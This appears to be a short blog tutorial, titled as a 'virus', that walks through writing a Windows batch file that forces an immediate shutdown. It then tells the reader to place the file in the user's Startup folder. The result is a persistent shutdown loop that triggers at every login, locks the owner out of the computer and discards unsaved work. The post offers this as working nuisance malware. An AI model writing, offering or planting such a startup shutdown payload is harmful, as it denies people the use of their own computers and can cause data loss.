Auto shutdown virus..!

by 10:10 0 comments

The "shutdown.bat" file is a batch file that can allow you to auto-launch applications and perform tasks just by opening it up. You can make this batch file do pretty much any Windows function you want, but for this tutorial, we are going to write a script to shutdown the computer. Here's how:

1. Open up "Notepad" by going to Start > Run > "Notepad" and then click OK.
2. In the notepad editor, type in: 
c:\windows\system32\shutdown -s -f -t 00
3. Save the file with .bat to your computer. You can put it pretty much anywhere on your computer. I put mine on my C: drive.

What this batch file does is it points to the shutdown function on your computer, generally located at c:\windows\system32\shutdown. You may want to double check this, as some computers may have it listed as c:\winnt\system32\shutdown. If this is the case, then you want to change your batch file accordingly. The -s tells it to shutdown the computer. The -f tells it to force the computer to shutdown so that it doesn't get hung on any open applications. The -t sets the time for it to wait before it actually shuts down. You can set it to whatever you want, but I put in 00 to set it to zero

paste it to :-C:\Users\"current user name"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

Note: Replace current user name whith your user name..! without quots..!

Tejen Dave


I'm a hacker, but I'm the good kind of hackers. And I've never been a criminal.


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